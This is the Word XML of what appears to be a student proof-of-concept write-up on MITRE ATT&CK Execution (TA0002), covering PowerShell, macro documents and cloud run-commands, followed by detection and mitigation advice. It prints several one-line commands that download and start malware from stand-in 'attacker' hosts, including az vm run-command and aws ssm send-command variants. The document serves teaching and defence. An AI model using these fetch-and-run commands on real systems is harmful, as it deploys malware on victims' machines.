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63A52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Rishita Shrim</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ali (292)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F439DF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept (PoC) – Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065CB97">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>🎯 Tactic: Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0476E44F">
      <w:r>
        <w:t>Goal: Execute malicious code on the target system to gain control and establish a foothold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0232C8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>🔹 Techniques Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26620C78">
      <w:r>
        <w:t>1. T1059 – Command and Scripting Interpreter (PowerShell)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>2. T1204.002 – User Execution: Malicious File</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>3. T1651 – Cloud Administration Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE39393">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>⚙ Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0F6E5">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 – Execute PowerShell Script (T1059)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160183D1">
      <w:r>
        <w:t>The attacker prepares a PowerShell script (`payload.ps1`) to download and execute malware:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Invoke-WebRequest http://attacker.server/malware.exe -OutFile malware.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Start-Process malware.exe</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Delivered through phishing link or shared folder.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Victim runs:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>powershell.exe -NoProfile -ExecutionPolicy Bypass -File payload.ps1</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Outcome: Malware executes under user privileges, establishing attacker access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449DF353">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 – Malicious File Execution by User (T1204.002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802F84C">
      <w:r>
        <w:t>A Word document with an embedded macro is crafted:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Shell "powershell.exe -ExecutionPolicy Bypass -File \\attacker\share\payload.ps1"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Sent via phishing email urging user to 'Enable Content.'</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Macro runs PowerShell command, executing the payload.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Outcome: Malware successfully executed via social engineering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1D997">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 – Remote Execution via Cloud Administration Command (T1651)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444BE14">
      <w:r>
        <w:t>With stolen cloud admin credentials, attacker runs commands on victim’s VM:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>az vm run-command invoke -g ResourceGroup -n VictimVM --command-id RunPowerShellScript --scripts "Invoke-WebRequest http://attacker/malware.exe -OutFile C:\temp\malware.exe; Start-Process C:\temp\malware.exe"</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Or with AWS SSM:</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>aws ssm send-command --instance-ids i-0123456789abcdef0 --document-name AWS-RunPowerShellScript --parameters 'commands=["Invoke-WebRequest http://attacker/malware.exe -OutFile C:\\temp\\malware.exe","Start-Process C:\\temp\\malware.exe"]'</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Outcome: Malware deployed remotely, no direct user interaction required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67704F2D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>📊 Summary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E5FFE55">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D97910">
            <w:r>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D521CA9">
            <w:r>
              <w:t>Technique ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="073B3121">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E0E2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B5906A">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF43043">
            <w:r>
              <w:t>T1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A9021DE">
            <w:r>
              <w:t>PowerShell script downloads and runs malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0BDD3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E8D7AA9">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ED78ECC">
            <w:r>
              <w:t>T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0063B1B5">
            <w:r>
              <w:t>User executes malicious macro document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="630757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E3BEBA">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3512FB06">
            <w:r>
              <w:t>T1651</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A34C054">
            <w:r>
              <w:t>Cloud admin command used to execute malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19A6523F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>🛡 Detection &amp; Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22154DFE">
      <w:r>
        <w:t>- PowerShell Monitoring: Detect suspicious commands with '-ExecutionPolicy Bypass'.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Email Security: Block or sandbox macro-enabled files, train users to avoid enabling macros.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>- Cloud Security: Use least-privilege roles, enable activity logging, monitor remote command executions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D03178">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>✅ Why This PoC Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE3C68">
      <w:r>
        <w:t>• Demonstrates multiple real-world execution methods (local user-driven, automated script, and remote cloud abuse).</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>• Shows how attackers chain techniques to increase success probability.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>• Reflects practical adversary tactics observed in real cyberattacks.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9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Rishita Shrimali</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-05T14:52:05Z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072E498EF0C1472EAC32A78328FE5562_13</vt:lpwstr>
  </property>
</Properties>
</file>